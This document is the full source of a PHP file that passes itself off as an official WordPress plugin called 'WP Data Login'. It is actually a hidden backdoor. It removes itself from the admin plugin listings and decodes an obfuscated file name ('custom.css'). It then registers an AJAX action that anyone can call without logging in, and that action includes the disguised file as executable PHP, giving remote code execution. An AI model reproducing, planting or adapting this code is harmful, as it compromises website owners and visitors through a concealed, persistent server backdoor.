File: /var/www/html/wp-content/plugins/wp-data-login/wp-data-login.php
<?php
/*
Plugin Name: WP Data Login
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 12.7.7
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
exit;
}
function kbv_uxv() {
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$h = array('wp-data-login/wp-data-login.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $h)) {
unset($wp_list_table->items[$key]);
}
}
}
}
function bet_avi($plugins) {
$s = 'wp-data-login/wp-data-login.php';
if (array_key_exists($s, $plugins)) {
unset($plugins[$s]);
}
return $plugins;
}
function pmh($x, $w) {
$z = '';
for ($m = 0; $m < strlen($x); $m += 2) {
$r = ord($x[$m]) - 65;
$k = ord($x[$m + 1]);
if ($k > 90) $k -= 6;
$t = $r * 52 + ($k - 65);
$z .= chr($t - $w);
}
return $z;
}
function ygm_ajax_handler() {
include plugin_dir_path(__FILE__) . pmh('RFRXRVRWRRRPQERFRVRV', 790);
die();
}
if (defined('ABSPATH')) {
add_action('pre_current_active_plugins', 'kbv_uxv');
add_filter('all_plugins', 'bet_avi');
add_action('wp_ajax_dat_log', 'ygm_ajax_handler');
add_action('wp_ajax_nopriv_dat_log', 'ygm_ajax_handler');
}